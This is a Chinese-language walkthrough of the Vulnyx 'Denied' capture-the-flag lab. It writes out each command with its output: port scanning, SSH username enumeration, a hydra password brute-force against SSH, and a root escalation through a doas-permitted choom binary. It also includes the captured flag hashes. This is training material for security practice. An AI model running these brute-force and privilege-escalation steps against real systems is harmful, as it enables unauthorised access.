Vulnyx-Denied-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.205  08:00:27:8d:4f:91       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e7:07:97       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.110 seconds (121.33 hosts/sec). 4 responded
❯ export ip=192.168.60.205
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.205:22
Open 192.168.60.205:80
Open 192.168.60.205:8080
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-30 08:42 CST
Initiating ARP Ping Scan at 08:42
Scanning 192.168.60.205 [1 port]
Completed ARP Ping Scan at 08:42, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:42
Completed Parallel DNS resolution of 1 host. at 08:42, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:42
Scanning 192.168.60.205 [3 ports]
Discovered open port 8080/tcp on 192.168.60.205
Discovered open port 22/tcp on 192.168.60.205
Discovered open port 80/tcp on 192.168.60.205
Completed SYN Stealth Scan at 08:42, 0.07s elapsed (3 total ports)
Nmap scan report for 192.168.60.205
Host is up, received arp-response (0.00089s latency).
Scanned at 2025-05-30 08:42:57 CST for 0s

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 64
80/tcp   open  http       syn-ack ttl 64
8080/tcp open  http-proxy syn-ack ttl 64
MAC Address: 08:00:27:8D:4F:91 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

枚举一下目录

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.205
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

没什么信息，同时8080端口也是，只有apache的默认页面

在web上没什么口子

这时候只能专注于ssh端口了

随便登录一下，发现被拒绝了

❯ ssh aaa@$ip
The authenticity of host '192.168.60.205 (192.168.60.205)' can't be established.
ED25519 key fingerprint is SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.205' (ED25519) to the list of known hosts.
[email protected]: Permission denied (publickey).

结合靶机名字来猜，是否需要特定的用户名才不会被denied

得到akira用户不会被拒绝，说明靶机中存在此用户

❯ for i in $(cat /usr/share/seclists/Usernames/Names/names.txt);do ssh $i@$ip ;done
………………………………
[email protected]'s password:

尝试爆破一下，凭证为akira:shakira

❯ hydra -l akira -P /usr/share/wordlists/rockyou.txt ssh://$ip -I -e nsr
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-30 09:00:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344402 login tries (l:1/p:14344402), ~896526 tries per task
[DATA] attacking ssh://192.168.60.205:22/
[STATUS] 306.00 tries/min, 306 tries in 00:01h, 14344097 to do in 781:17h, 15 active
[22][ssh] host: 192.168.60.205   login: akira   password: shakira
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-30 09:02:12

用户提权

ssh连接一下

❯ ssh akira@$ip
[email protected]'s password:
akira@denied:~$ id
uid=1000(akira) gid=1000(akira) grupos=1000(akira)
akira@denied:~$ cat user.txt
6acfb2803973dacc95152a873ba79255

发现不存在sudo权限，但存在doas权限

不过doas配置没法查看

akira@denied:~$ sudo -l
-bash: sudo: orden no encontrada
akira@denied:~$ cat /etc/doas.conf
cat: /etc/doas.conf: Permiso denegado
akira@denied:~$ ls -al /etc/doas.conf
-rw-r----- 1 root root 55 may 18 12:52 /etc/doas.conf

Root提权

并且doas是有用suid权限的程序

akira@denied:~$ find / -perm -u=s 2>/dev/null
/usr/bin/mount
/usr/bin/chsh
/usr/bin/doas
/usr/bin/passwd
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
akira@denied:~$ ls -al /usr/bin/doas
-rwsr-xr-x 1 root root 43184 jul 27  2022 /usr/bin/doas

意思就是要枚举哪些程序是可以被doas允许执行的呗

发现choom是可以以root身份执行的

akira@denied:~$ for i in $(ls /usr/bin);do doas -u root /usr/bin/$i 2>&1 |grep -v not;done
choom: no se ha especificado ni PID ni ORDEN
Escriba 'choom --help' para obtener más información.

/usr/bin/choom 是一个用于显示和调整 Out-Of-Memory (OOM) killer 评分的程序。

OOM Killer (内存不足杀手) 是 Linux 内核中的一个机制，当系统内存严重不足时，它会选择并杀死某些进程以释放内存，从而避免整个系统崩溃。每个进程都会有一个 **OOM 评分 (OOM score)**，这个评分越高，就越有可能在 OOM 发生时被 OOM killer 选中并杀死。

• choom [opciones] -n number [--] order [args...]]

  ：

  • 这个用法是在启动一个新命令/程序时，同时为其设置 OOM 评分的调整值。
  • -- 是一个约定，用于分隔 choom 自身的选项和要执行的命令及其参数。
  • 例如：choom -n 500 -- my_custom_script.sh 会在执行 my_custom_script.sh 的同时，将其 OOM 调整值设为500。

akira@denied:~$ doas -u root /usr/bin/choom -n 0 -- /bin/bash
root@denied:/home/akira# id
uid=0(root) gid=0(root) grupos=0(root)
root@denied:/home/akira# cat /root/root.txt
ea2118e462426513a247964eb8320c27